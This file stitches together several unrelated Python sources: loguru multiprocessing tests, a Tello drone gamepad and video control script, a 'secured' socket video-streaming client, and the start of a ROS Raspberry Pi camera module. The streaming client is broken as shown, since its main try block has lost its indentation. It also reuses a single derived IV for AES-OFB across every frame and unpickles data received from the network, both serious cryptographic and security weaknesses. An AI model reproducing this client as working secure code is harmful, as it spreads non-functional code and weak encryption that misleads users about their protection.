    out, err = capsys.readouterr()
    assert filepath.read() == "Child\nMain\n"
    assert out == ""
    assert err == "Child\nMain\n"
    assert output == ["Child\n", "Main\n"]
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_not_picklable_sinks_fork(capsys, tmpdir):
    """Same non-picklable sinks, fork start method, logger passed as argument."""
    filepath = tmpdir.join("test.log")
    stream = sys.stderr
    output = []
    logger.add(str(filepath), format="{message}", enqueue=True)
    logger.add(stream, format="{message}", enqueue=True)
    logger.add(lambda m: output.append(m), format="{message}", enqueue=True)
    process = multiprocessing.Process(target=subworker, args=[logger])
    process.start()
    process.join()
    logger.info("Main")
    logger.remove()
    out, err = capsys.readouterr()
    assert filepath.read() == "Child\nMain\n"
    assert out == ""
    assert err == "Child\nMain\n"
    assert output == ["Child\n", "Main\n"]
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_not_picklable_sinks_inheritance(capsys, tmpdir):
    """Same non-picklable sinks, fork start method, module-level logger inherited."""
    filepath = tmpdir.join("test.log")
    stream = sys.stderr
    output = []
    logger.add(str(filepath), format="{message}", enqueue=True)
    logger.add(stream, format="{message}", enqueue=True)
    logger.add(lambda m: output.append(m), format="{message}", enqueue=True)
    process = multiprocessing.Process(target=subworker_inheritance)
    process.start()
    process.join()
    logger.info("Main")
    logger.remove()
    out, err = capsys.readouterr()
    assert filepath.read() == "Child\nMain\n"
    assert out == ""
    assert err == "Child\nMain\n"
    assert output == ["Child\n", "Main\n"]
|
Tello3_video.py | # tello demo by Ryze Robotics, modified by Martin Piehslinger
# added video and gamepad support
# learned from (among others):
# https://learnopencv.com/read-write-and-display-a-video-using-opencv-cpp-python/
# https://docs.opencv.org/4.5.1/d7/d9e/tutorial_video_write.html
import threading
import socket
import sys
import time
import os
import inputs # for gamepad
from pythonping import ping
import argparse
import cv2
#------------------------------------------------------------------------
def waitForConnection (IpAddress):
    '''Ping *IpAddress* once per second until it answers. No timeout - blocks forever.'''
    attempt = 0
    while True:
        attempt += 1
        # A raised exception (e.g. no route) counts as a failed attempt.
        try:
            result = ping(IpAddress, timeout=1, count=1)
        except Exception as e:
            print(str(e))
            result = None
        if result is not None and result.success():
            break
        # overwrite the same console line on each retry (Python3 only)
        print('waiting for connection ' + str(attempt) + ' ...', end="\r")
        time.sleep(1)
    print("connected.")
#-----------------------------------------------------------------------------------
def recv():
    '''task to receive information from Tello. Simply print message to screen'''
    # NOTE(review): TimeSent is declared global but never used here; the main
    # script assigns 'TimeSend' (different spelling) - confirm intent.
    global TimeSent
    global Running
    global DataDecoded
    print ("Tello recv task started")
    # count is currently unused
    count = 0
    while Running:
        RecvError = False
        try:
            # 1518 bytes = max Ethernet frame; sock has a 1 s timeout set in main
            data, server = sock.recvfrom(1518)
        except Exception as e:
            RecvError = True
            # NOTE(review): matching the exception by its message string is
            # fragile; socket.timeout would be the robust check.
            if (str(e) == 'timed out'):
                print (".", end = "") # python2 users, please remove this line
                pass
            else:
                # any other error ends the receive task
                print ('\n------------------- Exception: ' + str(e) + '\n')
                break
        if (not RecvError):
            # publish the last decoded reply for other threads and echo it
            DataDecoded = data.decode(encoding="utf-8")
            print(DataDecoded)
#--------------------------------------------------------------
def expFunc (x, ignore=500, limit=100):
    """Map a raw gamepad axis value to a Tello rc channel value.

    Applies a deadzone and a quadratic response curve: fine control near the
    stick centre, full speed at the extremes.

    Args:
        x: raw axis reading, nominally in [-32767, 32767].
        ignore: deadzone half-width; |x| below this maps to 0 (default 500,
            generalized from the previous hard-coded constant).
        limit: maximum magnitude of the returned value (default 100, the
            range Tello rc commands accept).

    Returns:
        int in [-limit, limit].
    """
    magnitude = abs(x)
    if magnitude < ignore:
        return 0
    sign = 1 if x > 0 else -1
    y = int(sign * limit * ((magnitude - ignore) / (32767 - ignore)) ** 2)
    # Clamp: raw readings can exceed the nominal 32767 range.
    return max(-limit, min(limit, y))
#--------------------------------------------------------------
# def expFunc (x):
# y = int(x / 327)
# return y
#--------------------------------------------------------------
def rcCommand (RcArray):
    '''Build an "rc a b c d" command string from the first four raw stick values.

    Each raw value is passed through expFunc (deadzone + quadratic curve)
    before being formatted.
    '''
    parts = ['rc'] + [str(expFunc(RcArray[axis])) for axis in range(4)]
    return ' '.join(parts)
#-----------------------------------------------------------------------------------
def pad():
    '''Gamepad task: poll the gamepad and translate events into Tello commands.

    Sticks feed the four "rc" channels (via rcCommand/expFunc), the D-pad
    triggers flips, Y/A/X take off, land and query battery, B ends the
    program, the shoulder buttons start/stop video, START spins up the
    motors, and SELECT or pressing either thumb stick sends "emergency"
    (motor cut-off). Commands go out over the global UDP socket.
    '''
    global Running
    global RunningVideo
    global Rc
    global sock
    pads = inputs.devices.gamepads
    if (len(pads) > 0):
        print ("found gamepad" + str(pads[0]))
        # short rumble to confirm the pad was detected
        pads[0].set_vibration(1, 1, 200)
        while (Running):
            msgPad = ''
            events = inputs.get_gamepad()
            for event in events:
                msgPad = "" # preset
                if (event.ev_type == "Absolute"):
                    if (event.code == "ABS_X"):
                        Rc[3] = event.state
                        msgPad = rcCommand (Rc)
                    elif (event.code == "ABS_Y"):
                        Rc[2] = event.state
                        msgPad = rcCommand (Rc)
                    elif (event.code == "ABS_RX"):
                        Rc[0] = event.state
                        msgPad = rcCommand (Rc)
                    elif (event.code == "ABS_RY"):
                        Rc[1] = event.state
                        msgPad = rcCommand (Rc)
                    elif (event.code == "ABS_Z"): # left trigger ... very slow rotation left
                        Rc[3] = event.state * (-100)
                        msgPad = rcCommand (Rc)
                    elif (event.code == "ABS_RZ"): # right trigger ... very slow rotation right
                        Rc[3] = event.state * 100
                        msgPad = rcCommand (Rc)
                    elif (event.code == "ABS_HAT0X"):
                        if (event.state == -1):
                            msgPad = "flip l"
                        elif (event.state == 1):
                            msgPad = "flip r"
                    elif (event.code == "ABS_HAT0Y"):
                        if (event.state == -1):
                            msgPad = "flip f"
                        elif (event.state == 1):
                            msgPad = "flip b"
                elif (str(event.ev_type) == "Key"):
                    if (event.code == "BTN_NORTH"):
                        if (str(event.state) == "1"):
                            msgPad = "takeoff"
                    elif (event.code == "BTN_SOUTH"):
                        if (str(event.state) == "1"):
                            msgPad = "land"
                    elif (event.code == "BTN_WEST"):
                        if (str(event.state) == "1"):
                            msgPad = "battery?"
                    elif (event.code == "BTN_EAST"):
                        if (str(event.state) == "1"):
                            Running = False
                    elif (event.code == "BTN_TL"):
                        if (str(event.state) == "1"):
                            RunningVideo = True
                            msgPad = "streamon"
                            print ("starting video")
                    elif (event.code == "BTN_TR"):
                        if (str(event.state) == "1"):
                            RunningVideo = False
                            # msgPad = "streamoff" # seems to be contraproductive
                            print ("stopping video")
                    elif (event.code == "BTN_START"):
                        if (str(event.state) == "1"):
                            msgPad = "rc -100 -100 -100 100"
                            print ("starting motors")
                    # BUG FIX: inputs reports plain codes like "BTN_THUMBR";
                    # the old comparisons against "BTN_THUMBR 1" / "BTN_THUMBL 1"
                    # (code and state pasted together) could never match, so the
                    # thumb-stick emergency cut-off never fired.
                    elif (event.code == "BTN_THUMBR"):
                        if (str(event.state) == "1"):
                            msgPad = "emergency"
                    elif (event.code == "BTN_THUMBL"):
                        if (str(event.state) == "1"):
                            msgPad = "emergency"
                    elif (event.code == "BTN_SELECT"):
                        if (str(event.state) == "1"):
                            msgPad = "emergency"
                if (msgPad != ""):
                    if 'rc' not in msgPad: # don't print rc messages
                        print (msgPad)
                    msgPad = msgPad.encode(encoding="utf-8")
                    try:
                        sent = sock.sendto(msgPad, tello_address)
                    except Exception as e:
                        print (str(e))
    else:
        print ("No gamepad found")
    print ("pad task ended")
#-----------------------------------------------------------------------------------
def video():
    '''Video task: pull frames from the Tello UDP stream, optionally display
    and/or record them, then print throughput statistics when stopped.

    Controlled entirely through the globals Running / RunningVideo, which are
    set by the console loop and the gamepad task.
    '''
    global out
    global displayVideo
    global writeVideo
    global RunningVideo
    global Running
    print ("video task started")
    print (displayVideo, writeVideo)
    # wait for frame
    ret = False
    # scale down
    # NOTE(review): 'scale' is never used; scaling below uses args.scale.
    scale = 1
    while Running:
        # wait until video is started by user
        while Running and not RunningVideo:
            time.sleep (1)
        if not Running: # if video is not started at all, and user terminates the program
            print ("video task ended")
            return
        print ('One moment please...')
        time.sleep(3) # give tello some time to start the video stream
        if (displayVideo):
            print ("opening video window")
            cv2.namedWindow('Tello')
        print ('opening camera feed')
        # the Tello streams H.264 over UDP to port 11111 after "streamon"
        telloVideo = cv2.VideoCapture("udp://@0.0.0.0:11111")
        if (telloVideo.isOpened() == False):
            print("Unable to read camera feed")
        else:
            time.sleep(3) # give ffmpeg some time to analyze video stream
            frame_width = int(telloVideo.get(cv2.CAP_PROP_FRAME_WIDTH))
            frame_height = int(telloVideo.get(cv2.CAP_PROP_FRAME_HEIGHT))
            frame_fps = telloVideo.get(cv2.CAP_PROP_FPS)
            frame_fourcc = telloVideo.get(cv2.CAP_PROP_FOURCC)
            print (frame_width, ' x ', frame_height, ' ', frame_fps, 'fps', ', fourcc: ', frame_fourcc)
            if writeVideo:
                # find a filename which doesn't yet exist
                found = False
                count = 0
                while (not found):
                    filenameToWrite = 'telloVideo' + str(count).zfill(3) + '_' + args.codec + '.' + args.ext
                    if (os.path.exists(filenameToWrite)):
                        count = count + 1
                    else:
                        found = True
                codecString = args.codec
                while (len(codecString) < 4): # if codecString is less than 4 characters, add blank(s)
                    codecString = codecString + ' '
                fourcc = cv2.VideoWriter_fourcc(*codecString)
                print (hex(fourcc))
                out = cv2.VideoWriter(filenameToWrite, fourcc, frame_fps, (frame_width,frame_height))
            # pace writing/display to the stream's nominal frame rate
            videoInterval = 1 / frame_fps
            timeNextFrame = time.time() + videoInterval
            timeStart = time.time()
            numFramesReceived = 0
            numFramesWritten = 0
            numGlitches = 0
            numSkipped = 0
            numFailed = 0
            while Running and RunningVideo:
                # Capture frame-by-frame
                ret, frame = telloVideo.read()
                if(ret):
                    numFramesReceived = numFramesReceived + 1
                    now = time.time()
                    if (now >= timeNextFrame):
                        timeNextFrame = timeNextFrame + videoInterval
                        if (now > timeNextFrame): # if we missed a frame
                            numGlitches = numGlitches + 1
                        if writeVideo:
                            out.write(frame)
                            numFramesWritten = numFramesWritten + 1
                        # Display the frame
                        if (displayVideo):
                            if (args.scale != 1.0):
                                height , width , layers = frame.shape
                                new_h=int(height/args.scale)
                                new_w=int(width/args.scale)
                                frame = cv2.resize(frame, (new_w, new_h)) # <- resize for improved performance
                            cv2.imshow('Tello',frame)
                            cv2.waitKey(1) # this is essential, otherwise cv2 won't show anything!
                    else:
                        numSkipped = numSkipped + 1 # we received a frame too early, so we skipped it
                else:
                    numFailed = numFailed + 1
            print ('stopping video')
            timeVideo = time.time() - timeStart
            # When everything is done, clean up
            if writeVideo:
                out.release()
            if (displayVideo):
                cv2.destroyAllWindows()
            telloVideo.release()
            # do some statistics
            print ("time: ", timeVideo)
            print (numFramesReceived, "frames received, ", "%.2f" % (numFramesReceived/timeVideo), " fps")
            print (numFramesWritten, "frames written", "%.2f" % (numFramesWritten/timeVideo), " fps")
            print (numGlitches, " glitches")
            print (numFailed, " frames failed")
            print (numSkipped, " frames skipped")
    print ("video task ended")
#-----------------------------------------------------------------------------------
print ('\r\n\r\nTello Python3 Demo.\r\n')
print ('get help with parameter -h\r\n')
print ('Steer Tello with keyboard commands or gamepad')
print ('Issue normal Tello commands like takeoff')
print ('Additional commands: ')
print ('	start (start motors without taking off), ')
print ('	video (start video), ')
print ('	oediv (stop video), ')
print ('	end (end program)')
parser = argparse.ArgumentParser(description = "Tello Joystick Video", epilog = "Steer with keyboard commands like \"takeoff\" or with gamepad, start video with command \"video\" or with left shoulder button of gamepad")
parser.add_argument("-d", "--display", type=str, default='no', help="display video yes/no, default = no")
parser.add_argument("-s", "--scale", type=float, default=1.0, help="scale down video frame for performance reasons, default = 1.0 (don't rescale)")
parser.add_argument("-w", "--write", type=str, default='no', help="write video yes/no, default = no")
parser.add_argument("-c", "--codec", type=str, default='XVID', help="Video compression codec, default = XVID")
parser.add_argument("-e", "--ext", type=str, default='avi', help="Video file extension, default = avi")
args = parser.parse_args()
# Shared state flags read/written by the recv/video/pad threads below.
Running = True
RunningVideo = False
DataDecoded = ""
out = None
# accept "y"/"yes"/"Y" etc. for the display and write flags
if ("Y" in args.display.upper()):
    displayVideo = True
else:
    displayVideo = False
if ("Y" in args.write.upper()):
    writeVideo = True
else:
    writeVideo = False
host = ''
# port = 9000
port = 8889
locaddr = (host,port)
# Create a UDP socket
IpAddress = '192.168.10.1' # hard coded. For Tello EDU, we could add ip as a a parameter
tello_address = (IpAddress, 8889)
# tello_address = (IpAddress, port)
waitForConnection (IpAddress)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout (1)
sock.bind(locaddr)
# NOTE(review): assigned as 'TimeSend' here, but recv() declares
# 'global TimeSent' (different spelling); neither is actually used.
TimeSend = 0
Rc = [0,0,0,0]
#recvThread create
recvThread = threading.Thread(target=recv)
recvThread.start()
#videoThread create
videoThread = threading.Thread(target=video)
videoThread.start()
# padThread create
padThread = threading.Thread(target=pad)
padThread.start()
msg = 'command' # initial command to enter sdk mode
# Console command loop: read keyboard commands and forward them to the Tello.
while Running:
    if (msg == ''):
        msg = input(">")
    if 'video' in msg: # start video
        RunningVideo = True;
        msg = 'streamon'
    elif 'oediv' in msg: # "video", read backwards .... stop video
        RunningVideo = False;
        # msg = 'streamoff' # seems to be contraproductive
        msg = ''
    elif 'start' in msg:
        msg = "rc -100 -100 -100 100" # start motors
    elif 'end' in msg: # end program
        print ('...')
        Running = False
        RunningVideo = False
        msg = ''
    if (msg != ''):
        # Send data
        msg = msg.encode(encoding="utf-8")
        sent = sock.sendto(msg, tello_address)
        print (str(sent) + ' bytes sent')
        msg = ''
TimeShutdown = 2
print ("Will shut down in " + str(TimeShutdown) + " seconds")
time.sleep (TimeShutdown) # give recv task some time to end
sock.close()
exit()
|
streaming_secured_client.py | import socket
import cv2
import pickle
import struct
import threading
import argparse
import errno
import time
# For encryption
from cryptography.hazmat.primitives import hashes, hmac
from cryptography.hazmat.primitives.asymmetric import dh, padding, ec
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import PublicFormat, \
Encoding, load_der_public_key, load_pem_public_key, load_pem_private_key
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.exceptions import InvalidSignature
# Needed for logging
import logging
# Flag polled by the streaming loop; cleared by key_capture_thread to exit.
watching = True
# Frames of the console spinner shown while watching the stream.
watch_char = {
    0: "/",
    1: "-",
    2: "|",
    3: "\\",
    4: "|",
}
# When True, classic modular DH (RFC 3526) is used instead of ECDH;
# overwritten from the --disable-ecdh command-line flag in __main__.
disable_ecdh = False
def key_capture_thread():
    """Block until any line is entered on stdin, then signal the stream loop to stop."""
    global watching
    input()
    watching = False
    logging.getLogger("main").info("Starting exit process")
def encrypt(key, plaintext, iv):
    """AES-OFB encrypt *plaintext* under *key* / *iv*; returns the ciphertext bytes."""
    encryptor = Cipher(algorithms.AES(key), modes.OFB(iv)).encryptor()
    return encryptor.update(plaintext) + encryptor.finalize()
def decrypt(key, ciphertext, iv):
    """AES-OFB decrypt *ciphertext* under *key* / *iv*; returns the plaintext bytes."""
    decryptor = Cipher(algorithms.AES(key), modes.OFB(iv)).decryptor()
    return decryptor.update(ciphertext) + decryptor.finalize()
def generate_dh_key_pairs():
    """Generate a classic modular Diffie-Hellman key pair.

    Uses the fixed 2048-bit MODP group from RFC 3526 (group id 14), so both
    peers share the same p and g without negotiating parameters.

    Returns:
        (private_key, DER-encoded SubjectPublicKeyInfo public key bytes)
    """
    # Hard-coded p and g for DH Key exchange (RFC 3526 - group id 14)
    p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF # noqa: E501
    g = 2
    # Use our p and g with cryptography library
    params_numbers = dh.DHParameterNumbers(p, g)
    parameters = params_numbers.parameters(default_backend())
    # Generate private and public key
    host_private_key = parameters.generate_private_key()
    host_public_key_enc = host_private_key.public_key().public_bytes(Encoding.DER, PublicFormat.SubjectPublicKeyInfo)
    return (host_private_key, host_public_key_enc)
def generate_ecdh_key_pairs():
    """Generate an ECDH key pair on SECP384R1.

    Returns:
        (private_key, DER-encoded SubjectPublicKeyInfo public key bytes)
    """
    private_key = ec.generate_private_key(ec.SECP384R1())
    public_key_der = private_key.public_key().public_bytes(
        Encoding.DER, PublicFormat.SubjectPublicKeyInfo)
    return (private_key, public_key_der)
def client_dh_key_exchange(host_socket, host_private_key, host_public_key_enc,
                           serialized_RSA_server_public_key, serialized_RSA_client_public_key,
                           RSA_client_private_key):
    '''Client side of the RSA-authenticated (EC)DH key exchange.

    Receives the server's ephemeral public key, replies with our own
    ephemeral key plus an RSA-PSS signature binding both RSA identities and
    both ephemeral keys, verifies the server's signature, and returns the
    raw shared secret bytes.

    NOTE(review): each recv() assumes the full length-prefixed message
    arrives in a single call - confirm for fragmented TCP reads.
    '''
    global disable_ecdh
    main_logger = logging.getLogger("main")
    # Receiving size of remote's public key and remote's public key
    size = host_socket.recv(2)
    remote_public_key_enc = host_socket.recv(int.from_bytes(size, "big"))
    main_logger.debug(f"Size of remote's public key: {int.from_bytes(size, 'big')}")
    main_logger.debug(f"Remote's public key: {remote_public_key_enc}")
    # Decode remote's public key
    remote_public_key = load_der_public_key(remote_public_key_enc, default_backend())
    # Send Message to let server know it's going to send the public key
    # Compose constructed message for signature
    message_to_be_signed = (serialized_RSA_server_public_key +
                            serialized_RSA_client_public_key +
                            remote_public_key_enc +
                            host_public_key_enc)
    message_signature = sign(RSA_client_private_key, message_to_be_signed)
    host_socket.send(b"PUBK" +
                     len(host_public_key_enc).to_bytes(2, "big") +
                     host_public_key_enc +
                     len(message_signature).to_bytes(2, "big") +
                     message_signature)
    # NOTE(review): host_ip / port are module-level globals assigned in
    # __main__, not parameters of this function.
    main_logger.debug(f"Sent host's public key to {host_ip}:{port}")
    # Get server's signature
    size = host_socket.recv(2)
    remote_signature = host_socket.recv(int.from_bytes(size, "big"))
    # Verify server's signature
    intended_message = serialized_RSA_server_public_key + host_public_key_enc
    verify(load_pem_public_key(serialized_RSA_server_public_key), remote_signature, intended_message)
    # Generate shared key
    if disable_ecdh:
        shared_key = host_private_key.exchange(remote_public_key)
    else:
        shared_key = host_private_key.exchange(ec.ECDH(), remote_public_key)
    main_logger.debug(f"Shared Key: {shared_key}")
    return shared_key
def receive_and_decrypt_AES_OFB_message(host_socket, derived_key, derived_iv):
    """Read one 2-byte-length-prefixed ciphertext from *host_socket* and decrypt it."""
    length = int.from_bytes(host_socket.recv(2), "big")
    ciphertext = host_socket.recv(length)
    return decrypt(derived_key, ciphertext, derived_iv)
def lookupIP(client_socket, public_key):
    """Send the PKI lookup opcode (b'1') with a length-prefixed key; return the raw reply."""
    client_socket.send(b'1')
    prefixed_key = len(public_key).to_bytes(2, "big") + public_key
    client_socket.send(prefixed_key)
    return client_socket.recv(1024)
def registerPublicKey(client_socket, public_key, private_key):
    """Register *public_key* with the PKI server (opcode b'0').

    Sends the key and its RSA-PSS self-signature, each length-prefixed,
    and returns the server's raw reply.
    """
    client_socket.send(b'0')
    signature = sign(private_key, public_key)
    client_socket.send(len(public_key).to_bytes(2, "big") + public_key)
    client_socket.send(len(signature).to_bytes(2, "big") + signature)
    return client_socket.recv(1024)
def sign(private_key, data):
    """Return an RSA-PSS (SHA-256, max salt) signature over *data*."""
    pss_padding = padding.PSS(
        mgf=padding.MGF1(hashes.SHA256()),
        salt_length=padding.PSS.MAX_LENGTH
    )
    return private_key.sign(data, pss_padding, hashes.SHA256())
def verify(public_key, signature, message):
    """Check an RSA-PSS (SHA-256) *signature* over *message*.

    Delegates to cryptography's verify(), which raises InvalidSignature
    when the signature does not match.
    """
    log = logging.getLogger("main")
    log.debug("Verifying")
    log.debug(f"public_key: {public_key}")
    log.debug(f"signature: {signature}")
    log.debug(f"message: {message}")
    # Verify signature
    pss_padding = padding.PSS(
        mgf=padding.MGF1(hashes.SHA256()),
        salt_length=padding.PSS.MAX_LENGTH
    )
    public_key.verify(signature, message, pss_padding, hashes.SHA256())
if __name__ == '__main__':
    # Setup Logging: single-line JSON-ish records to stderr.
    main_logger_Format = '{"Timestamp":"%(asctime)s", "Logger":"%(name)s", "Level":"%(levelname)s", "Message":"%(message)s"}' # noqa: E501
    main_logger = logging.getLogger("main")
    main_logger_ch = logging.StreamHandler()
    main_formatter = logging.Formatter(main_logger_Format)
    main_logger.setLevel(logging.WARNING)
    main_logger_ch.setLevel(logging.WARNING)
    # Handle arguments
    ap = argparse.ArgumentParser()
    ap.add_argument("-i", "--host-ip", type=str, required=False,
                    help="ip address of the server to connect to, default: 127.0.0.1", default='127.0.0.1')
    ap.add_argument("-p", "--port", type=int, required=False,
                    help="port number to connect to, default: 9898", default=9898)
    ap.add_argument("--pki-host-ip", type=str, required=False,
                    help="ip address of the PKI server to connect to, default: 127.0.0.1", default='127.0.0.1')
    ap.add_argument("--pki-port", type=int, required=False,
                    help="PKI port number to connect to, default: 7777", default=7777)
    ap.add_argument("--rsa-pub-key", type=str, required=False,
                    help="Path to RSA PEM public key, default: env/keys/client/client_01/public-key.pem",
                    default='env/keys/client/client_01/public-key.pem')
    ap.add_argument("--rsa-priv-key", type=str, required=False,
                    help="Path to RSA PEM private key, default: env/keys/client/client_01/private-key.pem",
                    default='env/keys/client/client_01/private-key.pem')
    ap.add_argument("--disable-ecdh", type=bool, required=False,
                    help="Disable Elliptic Curve key generation for Diffie-Hellman Key Exchange, needs to match server, default: False", # noqa: E501
                    default=False)
    ap.add_argument("-l", "--log-level", type=str, required=False,
                    help="Level of logging: info, debug, warning, error, default: warning", default='warning')
    args = vars(ap.parse_args())
    if (args["log_level"].lower() not in ["info", "warning", "debug", "error"]):
        # BUG FIX: the argparse *module* has no 'error' attribute, so the old
        # 'argparse.error(...)' raised AttributeError instead of reporting the
        # bad value. ArgumentParser.error() prints usage and exits with status 2.
        ap.error('Unexpected log level entered. Valid choices are: info, error, warning, debug')
    if args["log_level"].lower() == "info":
        main_logger.setLevel(logging.INFO)
        main_logger_ch.setLevel(logging.INFO)
    elif args["log_level"].lower() == "warning":
        main_logger.setLevel(logging.WARNING)
        main_logger_ch.setLevel(logging.WARNING)
    elif args["log_level"].lower() == "debug":
        main_logger.setLevel(logging.DEBUG)
        main_logger_ch.setLevel(logging.DEBUG)
    elif args["log_level"].lower() == "error":
        main_logger.setLevel(logging.ERROR)
        main_logger_ch.setLevel(logging.ERROR)
    main_logger_ch.setFormatter(main_formatter)
    main_logger.addHandler(main_logger_ch)
    disable_ecdh = args["disable_ecdh"]
    if disable_ecdh:
        main_logger.info("ECDH is disabled, using DSA keys with Diffie-Hellman")
    else:
        main_logger.info("Using ECDH for key exchange")
    RSA_client_public_key = None
    RSA_client_private_key = None
    main_logger.info("Loading RSA keys...")
    # Long-term RSA identity keys used to authenticate the DH exchange.
    with open(args["rsa_pub_key"], "rb") as key_file:
        RSA_client_public_key = load_pem_public_key(
            key_file.read()
        )
    with open(args["rsa_priv_key"], "rb") as key_file:
        RSA_client_private_key = load_pem_private_key(
            key_file.read(),
            password=None,
        )
    # Serialize keys
    serialized_RSA_client_public_key = RSA_client_public_key.public_bytes(Encoding.PEM,
                                                                          PublicFormat.SubjectPublicKeyInfo)
    main_logger.debug(f"Public Key Loaded: {serialized_RSA_client_public_key}")
    # ## --------- PKI Register Pub Keys START-----------##
    # pki_client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    # pki_host_ip = args["pki_host_ip"]
    # pki_port = args["pki_port"]
    # pki_client_socket.connect((pki_host_ip,pki_port))
    # response = registerPublicKey(pki_client_socket, serialized_RSA_client_public_key, RSA_client_private_key)
    # main_logger.info("PKI response:", response)
    # pki_client_socket.close()
    # ## --------- PKI Register Pub Keys END -----------##
    # create socket
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    host_ip = args["host_ip"]
    port = args["port"]
    abort = False
    # daemon thread: any stdin input clears the global 'watching' flag.
    threading.Thread(target=key_capture_thread, args=(), name='key_capture_thread', daemon=True).start()
    frames_processed_counter = 0
try:
# Generate new dh key pairs before each connection
if disable_ecdh:
client_private_key, client_public_key_enc = generate_dh_key_pairs()
else:
client_private_key, client_public_key_enc = generate_ecdh_key_pairs()
# Initialize Connection
client_socket.connect((host_ip, port))
serialized_RSA_server_public_key = None
initial_message = (b"HELO" +
len(serialized_RSA_client_public_key).to_bytes(2, "big") +
serialized_RSA_client_public_key)
client_socket.sendall(initial_message)
# === GET RSA PUBLIC KEY START ===
data = client_socket.recv(4)
if data == b"HELO":
size = client_socket.recv(2)
serialized_RSA_server_public_key = client_socket.recv(int.from_bytes(size, "big"))
elif data == b"RJKT":
main_logger.info("Stream is running in restricted mode, only whitelisted users allowed")
abort = True
exit()
else:
abort = True
# === GET RSA PUBLIC KEY END ===
# === DH KEY EXCHANGE START ===
client_socket.sendall(b"DHINI")
shared_key = client_dh_key_exchange(client_socket,
client_private_key,
client_public_key_enc,
serialized_RSA_server_public_key,
serialized_RSA_client_public_key,
RSA_client_private_key)
data = client_socket.recv(5)
if data == b"DHFIN":
main_logger.debug("Finished DH Key Exchange")
# === DH KEY EXCHANGE END ===
# Derive Key from shared key, length is in byte (32 byte = 256 bit)
derived_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'handshake data',).derive(shared_key)
main_logger.debug(f"Derived Key: {derived_key}")
# A 16 byte IV will be derived so both client and server has the same IV.
derived_iv = HKDF(algorithm=hashes.SHA256(), length=16, salt=None, info=b'aes ofb iv',).derive(shared_key)
main_logger.debug("Derived IV: {derived_iv}")
# HMAC key
derived_hmac_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'mac',).derive(shared_key)
main_logger.debug(f"Derived HMAC Key: {derived_hmac_key}")
# Session ID
derived_session_id = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'session id',).derive(shared_key) # noqa: E501
main_logger.debug(f"Derived Session ID: {derived_session_id}")
component_id_tracker = 0
# initialize data var
data = b""
# Specify size as 8 bytes
payload_size = struct.calcsize("Q")
smud = 0
stracker = 0
start_time = time.time()
while watching:
client_socket.send(b"READY")
# Grab packet
while len(data) < payload_size:
packet = client_socket.recv(4*1024)
if smud < 200:
if smud % 20 == 0:
time_passed = time.time() - start_time
avg_fps = frames_processed_counter / time_passed
avg_fps = "{0:.2f}".format(avg_fps)
print(f"{watch_char[stracker]} watching stream {watch_char[stracker]} AVG FPS: {avg_fps}", end="\r") # noqa: E501
stracker += 1
if stracker > 4:
stracker = 0
smud += 1
else:
smud = 0
if not packet:
break
data += packet
# Verify data sizes
recv_hmac_sig = data[:32]
if len(recv_hmac_sig) != 32:
continue
remote_session_id = data[32:32+32]
if len(remote_session_id) != 32:
continue
remote_bytes_component_id = data[32+32:32+32+4]
if len(remote_bytes_component_id) != 4:
continue
packed_msg_size = data[32+32+4:32+32+4+payload_size]
if len(packed_msg_size) != payload_size:
continue
# Get the encrypted frame
data = data[32+32+4+payload_size:]
# Unpack to get real size of expected message
msg_size = struct.unpack("Q", packed_msg_size)[0]
# Get the rest of the frame data
while (len(data) < msg_size) and (len(data) < 1536165):
data += client_socket.recv(4*1024)
# Store the full frame data
frame_data = data[:msg_size]
# Verification
# Verify HMAC
recv_message = remote_session_id + remote_bytes_component_id + packed_msg_size + frame_data
h = hmac.HMAC(derived_hmac_key, hashes.SHA256())
h.update(recv_message)
try:
h.verify(recv_hmac_sig)
except InvalidSignature:
continue
# Verify session id matches
if derived_session_id != remote_session_id:
continue
# Verify component id increased
remote_int_component_id = int.from_bytes(remote_bytes_component_id, "big")
if remote_int_component_id <= component_id_tracker:
continue
else:
component_id_tracker = remote_int_component_id
# Decrypt data
frame_data = decrypt(derived_key, frame_data, derived_iv)
# Keep the tail data in data variable
data = data[msg_size:]
# Deserialize frame data
frame = pickle.loads(frame_data)
# Display the images
cv2.imshow("WATCHING %s STREAM" % (host_ip), frame)
key = cv2.waitKey(1) & 0xFF
if key == ord('q') or not watching:
main_logger.info("Leaving the Stream")
client_socket.sendall(b"LEAVING")
break
frames_processed_counter += 1
except struct.error as e:
# Handle case when server stops sending data, i.e. stream ended
if len(packed_msg_size) == 0:
main_logger.info("Stream has ended")
else:
raise e
except ConnectionResetError as e:
if e.errno == errno.ECONNRESET:
main_logger.info("Stream has ended")
else:
raise e
except BrokenPipeError as e:
if e.errno == errno.EPIPE:
main_logger.info("Stream may have ended, or connection dropped.")
else:
raise e
finally:
client_socket.close()
|
camera_rpi_2.py | #!/usr/bin/env python
from __future__ import print_function
import rospy
from std_msgs.msg import String
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs.msg import CompressedImage
from imutils.video.pivideostream import PiVideoStream
import argparse
import imutils
from picamera.array import PiRGBArray
from picamera import PiCamera
import time, cv2, sys
import numpy as np
from threading import Thread
class PiVideoStream:
def __init__(self, resolution=(320, 240), framerate=60):
self.camera = PiCamera()
